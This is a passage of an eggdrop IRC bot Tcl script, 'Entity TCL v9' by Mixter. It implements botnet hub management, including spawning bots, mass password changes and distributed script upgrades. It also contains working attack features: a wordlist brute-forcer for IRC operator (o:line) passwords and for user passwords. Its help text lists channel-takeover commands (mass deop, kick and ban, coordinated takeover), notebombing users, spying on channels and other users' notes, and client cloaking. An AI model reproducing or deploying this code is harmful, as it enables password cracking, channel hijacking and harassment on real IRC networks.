  putcmdlog "[sv] \[ircop bot\] Password for $nicktohack is [lindex $wordlist $wordnr]"
  putserv "mode $botnick +iswfck"
  unset cracking ; unset nicktohack ; unset wordnr
  return 1
 }
}
proc dcc:lamepass {h idx a} {
 global wordlist ; set lamer [lindex $a 0]
 if {$lamer == "" || ![validuser $lamer]} {
  putdcc $idx "[sv] \[crack\] usage: .crack <user>" ; return 1
 }
 if {[passwdok $lamer ""]} {
  putdcc $idx "[sv] \[crack\] $lamer has no password set." ; return 1
 }
 putdcc $idx "[sv] \[crack\] Cracking password for $lamer, please hold..."
 foreach a $wordlist {
  if {[passwdok $lamer $a]} {
   putdcc $idx "[sv] \[crack\] LOGIN: $lamer PASSWORD: $a"
   chattr $lamer -nmtojx
   sendnote [boat] $lamer "YOUR PASSWORD IS INSECURE. I HAVE REVOKED YOUR PRIVILEGES. -- Regards, [boat]"
   putcmdlog "[sv] \[security\] $h found insecure password for $lamer."
   putcmdlog "[sv] \[security\] removed all dangerous flags for $lamer."
   backup ; save ; return 1
  }
 }
 putdcc $idx "[sv] \[crack\] Password is secure: $lamer"
 return 0
}
putlog "[sv] \[init\] - 0x12 - oper bot"
## 0x13. HUB. botnet/bottree maintenace, limbomode and remote accounting tools
bind dcc n spawn dcc:spawn
bind dcc n netdebug dcc:netdebug
bind dcc n mpass mpass
bind dcc n limbo limbo
bind dcc n qpass qpass
bind dcc t tolink tolink
bind dcc t la linkall
bind dcc t linkall linkall
bind dcc t newbot newbot
bind dcc t newhub newhub
bind dcc n update dccupdate
bind dcc t autolink dcc:autolink
bind dcc t al dcc:autolink
bind dcc n pshare dcc:pshare
bind bot - psh bot:pshare
bind bot - mpass bot:mpass
bind bot - rpass bot:rpass
proc dcc:spawn {hand idx arg} {
 global owner nick1
 if {![isown $hand]} {
  putdcc $idx "[sv] \[spawn\] sorry, this feature is for the shell owner [b]only[b]"
  putcmdlog "[sv] \[spawn\] SPAWN attempt: $hand : .spawn $arg"
  return 0
 }
 set bfile [lindex $arg 0] ; set bnick [lindex $arg 1]
 set bid [lindex $arg 2] ; set bname [lindex $arg 3]
 set bport [lindex $arg 4] ; set bchan [lindex $arg 5]
 set bnet [lindex $arg 6]
 if {![file exists ./conf.${nick1}]} {
  putdcc $idx "[sv] \[spawn\] error: no configfile 'conf' found (rename it or make a symlink)"
  return 0
 }
 if {![file exists ./e]} {
  putdcc $idx "[sv] \[spawn\] error: your eggdrop executable isnt called 'e'"
  putdcc $idx "[sv] \[spawn\] please [b]ln -s ./<name_of_eggdrop_binary> ./e[b]"
  return 0
 }
 if {[file exists $bfile]} {
  putdcc $idx "[sv] \[spawn\] error: the config file $bfile already exists"
  return 0
 }
 if {[lindex $arg 6] == ""} {
  putdcc $idx "[sv] \[spawn\] - spawns a second bot off of this shell"
  putdcc $idx "[sv] \[spawn\] - usage: .spawn <configfile> <nick> <ident> <ircname> <port(s)> <channel(s)> <irc network>"
  putdcc $idx "[sv] \[spawn\] - multiple ports/channels must be marked by quotation, e.g. \"#bots #lamest\", \"3333 12345\""
  return 0
 }
 if {[string tolower [lindex $arg 1]] == [string tolower $nick1]} {
  putdcc $idx "[sv] \[spawn\] Refusing to recreate myself. Think of another botnick! :)"
  return 0
 }
 catch "exec mkdir $bnick" ; set conffd [open ./conf.${nick1} a]
 puts $conffd "exec /bin/sh -c \"cd $bnick ; ./${bfile}\" &"
 close $conffd ; set avifd [open ${bnick}/$bfile w]
 puts $avifd "#!./e" ; puts $avifd "set nick1 \"$bnick\""
 puts $avifd "set username \"$bid\"" ; puts $avifd "set realname \"$bname\""
 puts $avifd "set owner \"$owner\"" ; puts $avifd "set allport \"$bport\""
 puts $avifd "set useport \"0\"" ; puts $avifd "set botport \"0\""
 puts $avifd "set botchans \"$bchan\"" ; puts $avifd "set network \"$bnet\""
 puts $avifd "source entity.tcl" ; close $conffd
 catch "exec chmod 755 ${bnick}/${bfile}"
 newbot $hand $idx "$bnick [myip] [lindex $bport 0]" ; save
 catch "exec cp .u.$nick1 ${bnick}/.u.${bnick}"
 catch "exec ln -s ../e ${bnick}/e"
 catch "exec sh -c \"cp *.so ${bnick}/\""
 catch "exec cp entity.tcl ${bnick}/entity.tcl"
 catch "exec ln -s ../language ${bnick}/language"
 catch "exec ln -s ../help ${bnick}/help"
 catch "exec touch ${bnick}/conf.${nick1}"
 putcmdlog "[sv] #$hand# .spawn Nick: $bnick Id: $bid Channels: $bchan Net: $bnet"
 putdcc $idx "[sv] \[spawn\] successfully spawned bot $bnick, [b].rehash[b] to start it up"
 putdcc $idx "[sv] \[spawn\] then please telnet to your NEW bot and [b].botattr $nick1 +p[b]"
 return 0
}
proc bot:pshare {b c a} {
 set user [lindex $a 0] ; set uhost [lindex $a 1]
 if {[validuser $user]} {
  putlog "[sv] \[hub\] Ignored known userentry from $b: $user" ; return 0
 }
 addbot $user $uhost ; chattr $user +bfoZ ; save
 putlog "[sv] \[hub\] $b: +bot $user $uhost" ; return 0
}
proc dcc:pshare {h i arg} {
 set a [lindex $arg 0]
 if {![isown $h]} {
  putcmdlog "[sv] \[security\] P-Sharing attempt from [b]$h[b] - ignored."
  putdcc $i "[sv] \[notice\] Only permanent owners can do this." ; return 0
 }
 if {[validuser $a] && [matchattr $a b]} {
  set b [lindex [getuser $a BOTADDR] 0]:[lindex [getuser $a BOTADDR] 1]
  putcmdlog "[sv] \[hub\] #$h# .pshare $a $b"
  putdcc $i "[sv] \[notice\] sharing $a $b"
  putallbots "psh $a $b" ; return 0
 }
 if {$a == "*"} {
  putcmdlog "[sv] \[hub\] #$h# .pshare [b]*[b]"
  foreach user [userlist b] {
   if {[matchattr $user b]} {
    set b [lindex [getuser $user BOTADDR] 0]:[lindex [getuser $user BOTADDR] 1]
    putdcc $i "[sv] \[notice\] sharing $user $b" ; putallbots "psh $user $b"
   }
  }
  return 0
 }
 putdcc $i "[sv] \[usage\] .pshare <bot>/*" ; return 0
}
dv netd 0
proc dcc:netdebug {hand idx arg} {
 global netd
 if {$netd} {
  set netd 0 ; catch "unbind bot -b * bot:netdebug"
  putcmdlog "[sv] \[hub\] botnet debugging switched off"
 } {
  set netd 1 ; bind bot -b * bot:netdebug
  putcmdlog "[sv] \[hub\] botnet debugging switched on"
 } }
proc bot:netdebug {bot cmd arg} {
 putlog "\[netdebug\] !! cmd [b]$cmd[b] from non-bot [b]$bot[b]: [b]$arg[b] !!"
}
proc limbo {hand idx arg} {
 global limbo owner
 if {![isown $hand]} {
  putcmdlog "[sv] $hand tried to switch into limbo (ignored: not owner)."
  putdcc $idx "[sv] Limbo mode can only be set by: $owner" ; return 1
 }
 if {$limbo != 0} {
  putdcc $idx "[sv] I am already in limbo mode, .restart to switch back."
  return 1
 }
 set limbo $hand
 putlog "[sv] \[hub\] This bot is now in secure limbo mode. ** REHASHING **"
 catch {
  unbind bot - rjoin bot:rjoin ; unbind bot bs peak bot:peak
  unbind bot - +channel bot:+channel ; unbind bot - -channel bot:-channel
  unbind bot - amsg bot:netmsg ; unbind bot - cycle bot:cycle
  unbind bot - setchanmode bot:mode ; unbind bot - mode bot:chanset
  unbind bot - xnick bot:xnick ; unbind bot - ragnarok bot:ragnarok
  unbind bot - resumenick bot:resumenick ; unbind bot - gop botnet_request
 }
 utimer 1 rehash ; return 0
}
proc limbomode {} {
 global limbo
 if {$limbo == 0} {
  putlog "[sv] \[LIMBO ERROR\] OUCH! TCL ERROR (Or someone played with .tcl)!"
  return 1
 }
 putlog "[sv] \[hub\] Going into limbo-mode. Booting non-owners."
 foreach dccx [dcclist] {
  set hnd [lindex $dccx 1]
  if {[validuser $hnd]==1} {
   if {![matchattr $hnd n] && ![matchattr $hnd b]} { killdcc [hand2idx $hnd] }
  }
 }
 proc norehash {h i a} { rehash } ; bind dcc - rehash norehash
 proc rehash {} { putcmdlog "[sv] \[limbo\] - rehash ignored" ; return 0 }
 global alint ; set alint 5
 foreach scantimer [utimers] { killutimer "[lindex $scantimer 2]" }
 foreach scantimer [timers] { killtimer "[lindex $scantimer 2]" }
 putlog "[sv] \[hub\] Running in secure limbo, requested by $limbo"
 timer 1 autolink ; return 0
}
proc linkall {hand idx arg} {
 set i 0 ; set via [lindex $arg 0]
 foreach bawt [userlist b] {
  if {[matchattr $bawt +b] == 1} {
   if {$via == ""} {
    if {[link $bawt] == 1} {
     putdcc $idx "[sv] \[hub\] Linking to $bawt" ; incr i
    }
   }
   if {$via != ""} {
    if {![islinked $bawt] == 1} {
     putdcc $idx "[sv] \[hub\] Linking to $bawt via $via"
     link $via $bawt ; incr i
    }
   }
  }
 }
 if {$i == 0} {
  putdcc $idx "[sv] \[hub\] All bots linked."
 } {
  putdcc $idx "[sv] \[hub\] Total bots linked: [b]$i[b]"
 }
 return 0
}
proc newbot {hand idx arg} {
 set nbnick [lindex $arg 0] ; set nbhost [lindex $arg 1]
 set bnport [lindex $arg 2] ; set bnpass [lindex $arg 3]
 if {$bnport == ""} {
  putdcc $idx "[sv] \[hub\] usage: .newbot <nick> <host> <port> \[pass\]"
  return 0
 }
 if {[validuser $nbnick] && ![matchattr $nbnick b]} {
  putdcc $idx "[sv] \[hub\] Sorry, $nbnick is already added as non-bot!"
  return 0
 }
 addbot $nbnick ${nbhost}:${bnport} ; chattr $nbnick +ofZ ; botattr $nbnick +s
 if {$bnpass != ""} {
  setuser $nbnick PASS $bnpass
  putdcc $idx "[sv] \[hub\] password for $nbnick is $bnpass"
 }
 putcmdlog "[sv] \[hub\] new passive sharebot: $nbnick address ${nbhost}:${bnport}, +of/+s"
 putdcc $idx "[sv] \[hub\] don't forget to [b].update[b]" ; return 0
}
proc newhub {hand idx arg} {
 set nbnick [lindex $arg 0] ; set nbhost [lindex $arg 1]
 set bnport [lindex $arg 2] ; set bnpass [lindex $arg 3]
 if {$bnport == ""} {
  putdcc $idx "[sv] \[hub\] usage: .newhub <nick> <host> <port>" ; return 0
 }
 if {[validuser $nbnick] && ![matchattr $nbnick b]} {
  putdcc $idx "[sv] \[hub\] Sorry, $nbnick is already added as non-bot!"
  return 0
 }
 addbot $nbnick ${nbhost}:${bnport} ; chattr $nbnick +ofZ ; botattr $nbnick +hp
 if {$bnpass != ""} {
  setuser $nbnick PASS $bnpass
  putdcc $idx "[sv] \[hub\] password for $nbnick is $bnpass"
 }
 putcmdlog "[sv] \[hub\] new hub (active sharing): $nbnick address ${nbhost}:${bnport}, +of/+ph"
 putdcc $idx "[sv] \[hub\] don't forget to [b].update[b]" ; return 0
}
proc tolink {hand idx arg} {
 global nick1 ; set bluh 0 ; set blah 0
 foreach x [userlist b] {
  set bleh 0 ; incr bluh
  foreach o [bots] { if {$o == $x} { set bleh 1 } }
  if {$bleh == 0} {
   if {[string compare $nick1 $x] && [matchattr $x b]} {
    putdcc $idx "[sv] \[hub\] Not linked: $x - [lindex [getuser $x BOTADDR] 0] [lindex [getuser $x BOTADDR] 1]" 
    incr blah
   }
  }
 }
 incr bluh -1
 putdcc $idx "[sv] \[hub\] To link: $blah bots, total known bots: $bluh"
}
proc qpass {hand idx arg} {
 global nick1
 foreach x [userlist b] {
  set bleh 0 ; set npass [lindex $arg 0]
  foreach o [bots] { if {$o == $x} { set bleh 1 } }
  if {$bleh == 0} {
   if {[matchattr $x b] && $x != $nick1} {
    putdcc $idx "[sv] \[hub\] Changed pass: $x ([lindex [getuser $x BOTADDR] 0])"
    setuser $x PASS $npass
   }
  }
 }
 return 0
}
proc dccupdate {hand idx arg} {
 putdcc $idx "[sv] \[hub\] Updating bot hosts, hold on..."
 putdcc $idx "[sv] \[hub\] Finished, [update] hosts updated."
}
proc update {} {
 set ucounter 0
 foreach b [bots] {
  foreach x [channels] {
   if {[getchanhost $b $x] != ""} {
    if {[catch "setuser $b HOSTS $b*![getchanhost $b $x]"]==0} {incr ucounter} continue
   }
   if {[getchanhost ${b}_ $x] != ""} {
    if {[catch "setuser $b HOSTS $b*![getchanhost ${b}_ $x]"]==0} {incr ucounter}
    continue
   }
  }
 }
 return $ucounter
}
dv alint 0
proc autolink {} {
 global alint
 foreach scantimer [timers] {
  if {[lindex $scantimer 1]=="autolink"} { killtimer "[lindex $scantimer 2]" }
 }
 if {$alint == 0} {return 0}
 foreach lamer [userlist b] { if {[matchattr $lamer Z]} { link $lamer } }
 timer $alint autolink ; return 1
}
proc dcc:autolink {hand idx arg} {
 set al [lindex $arg 0]
 if {$al < 0} {
  putdcc $idx "[sv] \[hub\] usage: autolink \[minutes\] (0 turns this off)"
  return 0
 }
 if {$al == 0} {
  putdcc $idx "[sv] \[hub\] disabled autolinks"
  global alint ; set alint 0 ; return 1
 }
 putdcc $idx "[sv] \[hub\] Autolinking all +Z bots each $al minutes..."
 global alint ; set alint $al ; autolink ; return 1
}
proc mpass {hand idx arg} {
 set mbot [lindex $arg 0] ; set mpass [lindex $arg 1]
 if {![matchattr $mbot b]} {
  putdcc $idx "[sv] \[hub\] $mbot is not a known bot" ; return 0
 }
 if {[lindex $arg 1] == ""} {
  putdcc $idx "[sv] \[hub\] massremoving password for $mbot"
  setuser $mbot PASS "" ; putallbots "rpass $mbot"
 }
 if {[lindex $arg 1] != ""} {
  putdcc $idx "[sv] \[hub\] masschanging password for $mbot"
  setuser $mbot PASS $mpass ; putallbots "mpass $mbot $mpass"
 }
 putcmdlog "[sv] \[hub\] - $hand masschanged the password for $mbot" ; return 0
}
proc bot:mpass {bot cmd arg} {
 if {![matchattr $who b]} {
  putcmdlog "[sv] \[security\] hacked password change from $bot for $who"
  putallbots "secu hacked password change from $bot for $who IGNORED" ; return 0
 }
 putcmdlog "[sv] \[hub\] - remotely changing password for [lindex $arg 0]..."
 setuser [lindex $arg 0] PASS [lindex $arg 1] ; return 0
}
proc bot:rpass {bot cmd arg} {
 if {![matchattr $who b]} {
  putcmdlog "[sv] \[security\] hacked password change from $bot for $who"
  putallbots "secu hacked password change from $bot for $who IGNORED" ; return 0
 }
 putcmdlog "[sv] \[hub\] - remotely removing password for [lindex $arg 0]..."
 setuser [lindex $arg 0] PASS "" ; return 0
}
putlog "[sv] \[init\] - 0x13 - hub extensions"
## 0x14. UPGRADE. distributed dynamic tcl upgrading and botnet mass-upgrading
bind dcc n upgrade dcc:upgrade
bind dcc n mu dcc:mu
bind dcc n distmotd dcc:distmotd
bind bot - newtcl upgrade:start
bind bot - donetcl upgrade:done
bind bot - mstart upgrade:mstart
bind bot - distmotd upgrade:distmotd
dv recving 0
if {$recving} {
 dccbroadcast "Upgrade error ([sv] [rv]) - Please re-upgrade this bot."
 set recving 0
}
proc dcc:mu {hand idx arg} {
 if {![isown $hand]} { putdcc $idx "[sv] \[upgrade\] forget it" ; return 0 }
 if {![passwdok $hand $arg]} {
  putdcc $idx "[sv] \[upgrade\] invalid password" ; return 0
 }
 putlog "[sv] \[upgrade\] mass upgrading will take [expr [llength [bots]/2]] minutes"
 dccbroadcast "[sv] \[upgrade\] mass upgrading, requested by ${hand}... [b]please keep the botnet traffic low and watch for errors![b]"
 set i 10
 foreach hello [bots] {
  utimer [incr i 30] "raw:upgrade $hello [encrypt $hello $arg]"
 }
 utimer [incr i 10] "dccbroadcast \"\[sv\] \\\[upgrade\\\] upgrade finished, back to normal\""
 putdcc $idx "[sv] \[upgrade\] Estimated upload time: $i seconds..." ; return 0
}
proc raw:upgrade {bot pass} {
 set opass [decrypt $bot $pass] ; putbot $bot "newtcl $opass"
 set avifd [open ./entity.tcl r] ; set upstat "busy"
 while {$upstat != "done"} {
  set nextline [gets $avifd]
  if {[string match *####EOT####* $nextline] && ![string match *match* $nextline]} { set upstat "done" }
  if {[string trim $nextline] == "\175"} {
   putbot $bot "rt $nextline ;# tcl sucks"
  } {
   putbot $bot "rt $nextline"
  }
 }
 putcmdlog "[sv] \[upgrade\] sent script revision [rv] to $bot..."
 close $avifd ; putbot $bot "donetcl entity" ; return 0
}
proc dcc:upgrade {hand idx arg} {
 global owner
 if {![isown $hand]} {
  putcmdlog "[sv] \[upgrade\] $hand tried to upgrade, but is not owner of this bot."
  return 0
 }
 set ubot [lindex $arg 0] ; set opass [lindex $arg 1]
 if {$opass == ""} {
  putdcc $idx "[sv] \[error\] You need to supply your password." ; return 0
 }
 if {[matchattr $ubot b] == 0} {
  putdcc $idx "[sv] \[error\] $ubot is not a known bot, sorry." ; return 0
 }
 if {[link $ubot]} {
  putdcc $idx "[sv] \[error\] $ubot is not linked... linking, try again."
  return 0
 }
 putcmdlog "[sv] \[upgrade\] sending script revision [rv] to $ubot..."
 putbot $ubot "newtcl $opass" ; catch "exec wc ./entity.tcl" blah
 set avifd [open ./entity.tcl r] ; set upstat "busy"
 while {$upstat != "done"} {
  set nextline [gets $avifd]
  if {[string match *####EOT####* $nextline] && ![string match *match* $nextline]} { set upstat "done" }
  if {[string trim $nextline] == "\175"} {
   putbot $ubot "rt $nextline ;# tcl sucks"
  } {
   putbot $ubot "rt $nextline"
  }
 }
 close $avifd ; putbot $ubot "donetcl entity" ; return 0
}
proc upgrade:start {bot cmd arg} {
 global owner recving
 if {$recving == 1} {
  dccbroadcast "[sv] Script upgrade from $bot failed - please wait 5 minutes and retransmit."
  catch "unbind bot - rt upgrade:read"
  catch "exec cp -f entity.tcl.old entity.tcl"
 }
 set opw [lindex $arg 0]
 if {[passwdok [owner1] $opw]} {
  bind bot - rt upgrade:read
  catch "exec cp -f ./entity.tcl ./entity.tcl.old"
  set avifd [open ./entity.tcl w]
  puts $avifd "######### upgraded by hub bot ##########"
  close $avifd ; dccbroadcast "[sv] Script upgrade starting from $bot..."
  set recving 1 ; return 0
 }
 dccbroadcast "[sv] Cannot upgrade - incorrect owner password." ; return 0
}
proc upgrade:read {bot cmd arg} {
 set avifd [open ./entity.tcl a] ; puts $avifd "$arg" ; close $avifd ; return 0
}
proc upgrade:done {bot cmd arg} {
 global recving
 if {$recving == 0} {
  putcmdlog "[sv] \[upgrade\] The tcl upgrade failed, restoring entity.tcl."
  dccbroadcast "[sv] \[upgrade\] TCL Adaption failed. Please re-transmit."
  catch "exec cp -f entity.tcl.old entity.tcl"
 } {
  putcmdlog "[sv] \[upgrade\] Adapted new tcl version from hub."
  catch "exec wc ./entity.tcl" bleh
  putcmdlog "[sv] \[upgrade\] New tcl is: $bleh"
  catch "unbind bot - rt upgrade:read" ; set recving 0
  catch "exec rm -f ..i" ; utimer 30 rehash
  dccbroadcast "[sv] \[upgrade\] Adapted new tcl version from hub."
 }
 return 0
}
proc dcc:distmotd {hand idx arg} {
 if {![isown $hand]} {
  putcmdlog "[sv] \[security\] $hand tried to distribute MOTD but is not owner of this bot"
  return 0
 }
 if {![islinked $arg]} {
  putcmdlog "[sv] \[upgrade\] #$hand# .distmotd, but bot \"$arg\" is not linked..."
  return 0
 }
 putdcc $idx "[sv] \[upgrade\] MOTD Transfer starting for $arg..."
 putbot $arg "mstart" ; set avifd [open motd r]
 while {![eof $avifd]} {
  set nextline [gets $avifd] ; putbot $arg "distmotd $nextline"
 }
 return 0
}
proc upgrade:mstart {bot cmd arg} {
 catch "exec cp -f motd motd.old"
 dccbroadcast "[sv] \[upgrade\] MOTD upgrade from $bot OK..."
 set avifd [open ./motd w] ; puts $avifd "$arg" ; close $avifd ; return 0
}
proc upgrade:distmotd {bot cmd arg} {
 set avifd [open ./motd a] ; puts $avifd "$arg" ; close $avifd ; return 0
}
putlog "[sv] \[init\] - 0x14 - dynamic upgrade extensions"
## 0x15. HELP. documentation of all user accessible functions of entity
catch "unbind dcc - help *dcc:help"
bind dcc - egghelp *dcc:help
bind dcc - help dcc:entity
bind dcc - entity dcc:entity
proc dcc:entity {hand i arg} {
 set banner "[u][b]E[b]ntit[b]y TCL v9[b][u], copyright 1996 - 2000 by [b]Mixter[b] <mixter@newyorkoffice.com>"
 set cmd [string tolower [lindex $arg 0]]
 if {$cmd == "help"} {set cmd [lindex $arg 1]}
 if {$cmd == "core"} {
  global alttcl altnotes altpass
  puth $i " [b]peak[b]    maximum user records for channels"
  puth $i " [b]probe[b]   status report on tcl and bug context"
  puth $i " [b]entity[b]  the help system you are just accessing"
  puth $i " [b]getops[b]  requests ops on all channels +m"
  puth $i " [b][boat][b]  (public) the bot will answer with a random phrase"
  puth $i " [b]$alttcl[b] execute a direct tcl command +n"
  puth $i " [b]$altnotes[b]     (msg) read notes"
  puth $i " [b]$altpass[b]     (msg) set a password"
  puth $i $banner ; return 0
 }
 if {$cmd == "security"} {
  puth $i " [b]autobitch[b] turn netsplit high-security mode off/on +n"
  puth $i " [b]openchans[b] set channel list with low security +owners"
  puth $i " [b]paranoia[b]  auto unlink possibly hacked bots +owners"
  puth $i " [b]crack[b]     brute force a users password +o"
  puth $i " [b]checkpass[b] check for user entries without passwords +m"
  puth $i $banner ; return 0
 }
 if {$cmd == "cloaking"} {
  puth $i " [b]bxlk / sv[b] emulate corresponding BitchX commands +m"
  puth $i " [b]klines[b]    show list of k-lined-servers +n"
  puth $i " [b]unkline[b]   removes k-lined-server +n"
  puth $i " [b]kline[b]     adds a server to the k-lined serverlist +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "channel"} {
  puth $i " [b]channels[b]  shows what channels the bot is on +o"
  puth $i " [b]join[b]      joins a channel +m"
  puth $i " [b]part[b]      leaves a channel +m"
  puth $i " [b]cycle[b]     parts and rejoins a channel very fast +m"
  puth $i " [b]chanset[b]   change channel settings <+/-setting> +m"
  puth $i " [b]mode[b]      set and enforce irc chanmodes +m"
  puth $i " [b]spyto[b]     set the channel to relay spy traffic to+n"
  puth $i " [b]spyfrom[b]   add a channel to relay traffic from +n"
  puth $i " [b]nospy[b]     remove a channel to relay traffic from +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "botnet"} {
  global botnick
  puth $i " [b]mmsg[b]     mass-message a nick with custom text +m"
  puth $i " [b]mrehash[b]  rehash all bots at once +n"
  puth $i " [b]msave[b]    make all bots save their userfiles +n"
  puth $i " [b]mmode[b]    make each bot send MODE <channel> <modes> +m"
  puth $i " [b]mchanset[b] make each bot set channel attributes <+/-...> +n"
  puth $i " [b]mchattr[b]  make each bot chattr <handle> <+/-flags> +n"
  puth $i " [b]mpasswd[b]  change a users password on all bots +n"
  puth $i " [b]mbchattr[b] make each bot botattr <bot> <+/-flags> +n"
  puth $i " [b]mcycle[b]   make all bots cycle a channel, takes a minute +n"
  puth $i " [b]mdel[b]     remove <handle> from all bots completely +n"
  puth $i " [b]mjoin[b]    make all bots join <channel> +n"
  puth $i " [b]ljoin[b]    join a limited amount of bots to <channel> +m"
  puth $i " [b]ujoin[b]    put a specific bot into <channel> +m"
  puth $i " [b]upart[b]    remove a specific bot from <channel> +m"
  puth $i " [b]mpart[b]    make all bots leave <channel> +n"
  puth $i " [b]mver[b]     show botnet version info for all bots +m"
  puth $i " [b]ping[b]     show tcl version info for a single bot - +m"
  puth $i " [b]rjoin[b]    toggle whether all bots join all channels) +n"
  puth $i " [b]share[b]    update a bot's adress (obsolete, use newbot/hub)"
  puth $i $banner ; return 0
 }
 if {$cmd == "jump"} {
  puth $i " [b]autojump[b] toggle auto-reconnecting to servers +n"
  puth $i " [b]jumpfrom[b] make all on a certain server jump +n"
  puth $i " [b]jumpto[b]  make all bots jump to a server+n"
  puth $i $banner ; return 0
 }
 if {$cmd == "dcc"} {
  puth $i " [b]botnick[b]  change the bot's nickname on irc +m"
  puth $i " [b]ndcc[b]     send text directly to a dcc index +n"
  puth $i " [b]sendlog[b]  sends log files, \"general\" or channel logs +m"
  puth $i " [b]alarms[b]   display todays intrusion detection alarms +m"
  puth $i " [b]notice[b]   send a notice to someone on irc +o"
  puth $i " [b]ctcp[b]     send a ctcp request to someone on irc +o"
  puth $i " [b]rctcp[b]    send a ctcp reply to someone on irc +o"
  puth $i " [b]dcc[b]      make the bot dcc chat a nick +o"
  puth $i " [b]topic[b]    set a topic on your main channel +o"
  puth $i " [b]massop[b]   ops all +o users on a channel +m"
  puth $i " [b]massdeop[b] deops all non-masters on a channel +m"
  puth $i " [b]masskick[b] kicks all non-masters from a channel +m"
  puth $i " [b]resynch[b]  massdeop, close, masskick and cycle +m"
  puth $i " [b]mail[b]     send e-mail from the bot +m"
  puth $i " [b]spynotes[b] read somebody else's notes +n"
  puth $i " [b]fchattr[b]  use chattr on all users whose flag matches +n"
  puth $i " [b]socks[b]    toggle socks5 scan and logging on join +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "allmodes"} {
  puth $i " [b]aup[b]      op yourself on all channels +m"
  puth $i " [b]aop[b]      op <nick> on all channels +m"
  puth $i " [b]adeop[b]    deop <nick> on all channels +m"
  puth $i " [b]ainv[b]     invite <nick> to all channels +m"
  puth $i " [b]akick[b]    kick <nick> from all channels +m"
  puth $i " [b]akb[b]      kickban <nick> from all channels +m"
  puth $i $banner ; return 0
 }
 if {$cmd == "nick"} {
  puth $i " [b]rnick[b]    0: resume default nicks, 1: change all nicks randomly +n"
  puth $i " [b]xnick[b]    change all nicks to pattern-<number> +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "oper"} {
  global botnick
  puth $i " [b]oper[b]     oper up by sending \"oper $botnick <pass>\" +m"
  puth $i " [b]kill[b]     kill <nick> with <reason> +n"
  puth $i " [b]connect[b]  connect <server> \[optionally to <port> <server2>\] +n"
  puth $i " [b]squit[b]    squit <server> with <comment> +n"
  puth $i " [b]srehash[b]  rehash ircd.conf +n"
  puth $i " [b]hack[b]     brute force an o:line +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "msg"} {
  puth $i " (Note: the usage is always /msg bot <command> <password> ...)"
  puth $i " [b]#ident[b]    add a new host to your user record"
  puth $i " [b]#inv[b]      invite someone to a channel"
  puth $i " [b]#channels[b] show all of the bots channels +o"
  puth $i " [b]#chat[b]     make the bot dcc chat you +o"
  puth $i " [b]#up[b]       op yourself on a channel +o"
  puth $i " [b]#op[b]       op <nick> on <chan> +o"
  puth $i " [b]#deop[b]     deop <nick> on <chan> +o"
  puth $i " [b]#kick[b]     kick <nick> from <chan> +o"
  puth $i " [b]#cycle[b]    cycle <chan> +o"
  puth $i " [b]#msg[b]      message <nick> with <txt> +o"
  puth $i " [b]#ban[b]      bankick <nick> from <chan> +o"
  puth $i " [b]#join[b]     add channel <chan> +m"
  puth $i " [b]#part[b]     remove channel <chan> +m"
  puth $i " [b]#link[b]     link to <bot> +m"
  puth $i " [b]#mop[b]      massop on <chan> +m"
  puth $i " [b]#upd[b]      update bot hosts +n"
  puth $i " [b]#chattr[b]   chattr <handle> to <flags> +m"
  puth $i " [b]#jump[b]     jump to <server> +n"
  puth $i " [b]#raw[b]      send <raw-command> to irc +n"
  puth $i $banner ; return 0
 }
 if {$cmd == "takeover"} {
  puth $i " [b]takeover[b]  disable (0), enable (1 or #channel) autokick on join +m"
  puth $i " [b]md[b]        deops EVERYONE but the bot on <chan> +m"
  puth $i " [b]mo[b]        ops EVERYONE on <chan> +m"
  puth $i " [b]mk[b]        kicks EVERYONE from <chan> +m"
  puth $i " [b]mb[b]        bans ALL OPS on <chan> from <chan> +m"
  puth $i " [b]cmd[b]       coordinated takeover with all bots on <chan> +m"
  puth $i " [b]cmk[b]       coordinated masskick with all bots on <chan> +m"
  puth $i $banner ; return 0
 }
 if {$cmd == "notebomb"} {
  puth $i " [b]nb[b] <user@bot> \[times\] \[message\]  notebomb a user - +m"
  puth $i $banner ; return 0
 }
 if {$cmd == "hub"} {
  puth $i " [b]spawn[b]    create new bots on-the-fly +owner"
  puth $i " [b]qpass[b]    removes all passwords of all non-linked bots +n"
  puth $i " [b]netdebug[b] debugging to find unknown bots in the botnet +n"
  puth $i " [b]tolink[b]   shows a list of all non-linked bots with hostnames +t"
  puth $i " [b]linkall[b]  tries to link every bot that is not linked already +t"
  puth $i " [b]autolink[b] activates a timer to keep relinking all +Z bots +t"
  puth $i " [b]newbot[b]   add a passive leaf <nick / host / port> +n"
  puth $i " [b]newhub[b]   add an active hub <nick / host / port> +n"
  puth $i " [b]limbo[b]    go into secure high-traffic limbo hub mode +owners"
  puth $i " [b]mpass[b]    change a bot's password on all bots on the net +n"
  puth $i " [b]pshare[b]   distribute bot records on a non-sharing botnet +n"
  puth $i " [b]distmotd[b] distribute local motd file to another bot +n"
  puth $i " [b]update[b]   actualize and add all bot's new hostmask entries +n"
  puth $i " [b]upgrade[b]  ugrades a bot's version of entity.tcl +owner"
  puth $i " [b]mu[b]       mass upgrade the complete botnet's tcls +owner"
  puth $i " [b]#li[b] (public)  link to <bot> \[optionally via <bot2>\] +n"
  puth $i " [b]#ba[b] (public)  botattr <bot> <flags> +n"
  puth $i " [b]#rp[b] (public)  remove bots passwords +n"
  puth $i " [b]#up[b] (public)  auto-update all bot hosts +n" ; return 0
 }
 puth $i "     [sv] by Mixter - [b][u]Help System[b][u]" ; puth $i " "
 puth $i " [b]core[b]     entity script function core"
 puth $i " [b]security[b] command/flood/channel protection, intrusion detection"
 puth $i " [b]cloaking[b] bX client, ircop- and level 2 flood protection"
 puth $i " [b]channel[b]  add/remove and handle channels"
 puth $i " [b]botnet[b]   botnet-wide user/channel management"
 puth $i " [b]jump[b]     change and massjump from servers"
 puth $i " [b]dcc[b]      entity dcc chat console commands"
 puth $i " [b]allmodes[b] perform an operation on all channels at once"
 puth $i " [b]msg[b]      password protected message commands"
 puth $i " [b]takeover[b] take over, purge, and hold ops on channels"
 puth $i " [b]notebomb[b] bomb users with notes"
 puth $i " [b]nick[b]     nickname mass changes via botnet"
 puth $i " [b]oper[b]     getting and maintaining operator status"
 puth $i " [b]hub[b]      botnet/bottree, limbo and remote maintenace"
 puth $i " [b]upgrade[b]  tcl upgrading via botnet" ; puth $i " "
 puth $i " Please type: [b].help[b] <[b]feature[b]>" ; puth $i " "
 puth $i "[sv] - For the [b]eggdrop[b] help files, please type [b].egghelp[b]"
